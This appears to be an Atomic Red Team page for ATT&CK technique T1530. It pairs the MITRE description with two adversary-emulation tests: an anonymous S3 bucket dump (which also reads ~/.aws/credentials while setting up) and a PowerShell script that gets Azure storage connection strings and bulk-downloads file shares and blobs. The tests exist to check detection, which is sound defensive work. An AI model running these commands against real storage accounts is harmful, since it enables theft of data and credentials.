# T1530 - Data from Cloud Storage Object ## Description from ATT&CK > Adversaries may access data from cloud storage. > > Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. > > In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). > > Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions. > > This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021) > > Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects. [Source](https://attack.mitre.org/techniques/T1530) ## Atomic Tests - [Atomic Test #1: AWS - Scan for Anonymous Access to S3](#atomic-test-1-aws---scan-for-anonymous-access-to-s3) - [Atomic Test #2: Azure - Dump Azure Storage Account Objects via Azure CLI](#atomic-test-2-azure---dump-azure-storage-account-objects-via-azure-cli) ### Atomic Test #1: AWS - Scan for Anonymous Access to S3 Upon successful execution, this test will test for anonymous access to AWS S3 buckets and dumps all the files to a local folder. **Supported Platforms:** Iaas:aws **auto_generated_guid:** `979356b9-b588-4e49-bba4-c35517c484f5` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | s3_bucket_name | Name of the bucket | string | redatomic-test2| #### Attack Commands: Run with `sh`! ```sh aws --no-sign-request s3 cp --recursive s3://#{s3_bucket_name} /tmp/#{s3_bucket_name} ``` #### Cleanup Commands ```sh aws s3 rb s3://#{s3_bucket_name} --force rm -rf /tmp/#{s3_bucket_name} ``` #### Dependencies: Run with `sh`! ##### Description: Check if ~/.aws/credentials file has a default stanza is configured ###### Check Prereq Commands ```sh cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1530/src/policy.json touch /tmp/T1530.txt aws s3 cp /tmp/T1530.txt s3://#{s3_bucket_name} ``` ###### Get Prereq Commands ```sh echo Please install the aws-cli and configure your AWS default profile using: aws configure ``` ### Atomic Test #2: Azure - Dump Azure Storage Account Objects via Azure CLI This test dumps the content of the storage account objects present in the file defined in file_shares_csv_file_path. Note that this file is created in the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup","StorageAccountName", "FileShareName", "ContainerName", "BlobName". Requirements: - The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required. - The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions. **Supported Platforms:** Iaas:azure **auto_generated_guid:** `67374845-b4c8-4204-adcc-9b217b65d4f1` #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_folder | Folder path to output file share content to | path | $env:temp\T1530_storage_account_objects| | storage_account_objects_csv_file_path | Path to file that contains all storage account objects in form of a csv file. This may be the result from Test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". | path | $env:temp\T1619_storage_account_objects.csv| #### Attack Commands: Run with `powershell`! ```powershell $storage_account_objects = Import-Csv -Path "#{storage_account_objects_csv_file_path}" # Login to Azure az login if (-not (Test-Path -Path "#{output_folder}")) { New-Item -ItemType Directory -Path "#{output_folder}" } foreach ($row in $storage_account_objects) { if ($row.FileShareName -ne ""){ $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess" if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null Write-Output "Shared key access is disabled for this storage account." } else { Write-Output "Fetching content from file share: $($row.FileShareName) in storage account $($row.StorageAccountName) ..." $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv # Create folder for storage account objects $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)" if (-not (Test-Path -Path $storageAccountOutputPath)) { New-Item -ItemType Directory -Path $storageAccountOutputPath } # create folder for file share content $fileSharePath = Join-Path -Path $storageAccountOutputPath $row.FileShareName if (-not (Test-Path -Path $fileSharePath)) { New-Item -ItemType Directory -Path $fileSharePath } az storage file download-batch --connection-string $connectionString --source $row.FileShareName --destination $fileSharePath } } elseif ($row.ContainerName -ne "" -and $row.BlobName -eq "") { $allowSharedKeyAccess = az storage account show --name $row.StorageAccountName --resource-group $row.ResourceGroup --query "allowSharedKeyAccess" if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null Write-Output "Shared key access is disabled for this storage account." } else { Write-Output "Fetching all blobs from container $($row.ContainerName) in storage account $($row.StorageAccountName) ..." $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv # Create folder for storage account objects $storageAccountOutputPath = Join-Path #{output_folder} "$($row.ResourceGroup)_$($row.StorageAccountName)" if (-not (Test-Path -Path $storageAccountOutputPath)) { New-Item -ItemType Directory -Path $storageAccountOutputPath } # create folder for blob content $containerFolderPath = Join-Path $storageAccountOutputPath $row.ContainerName if (-not (Test-Path -Path $containerFolderPath)) { New-Item -ItemType Directory -Path $containerFolderPath } az storage blob download-batch --destination $containerFolderPath --source $row.ContainerName --connection-string $connectionString } } } ``` #### Cleanup Commands ```powershell Remove-Item -Path "#{output_folder}" -Recurse -Force -erroraction silentlycontinue Write-Output "Removed #{output_folder}" ``` #### Dependencies: Run with `powershell`! ##### Description: Azure CLI must be installed ###### Check Prereq Commands ```powershell try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} ``` ###### Get Prereq Commands ```powershell Install-Module -Name Az -Force ```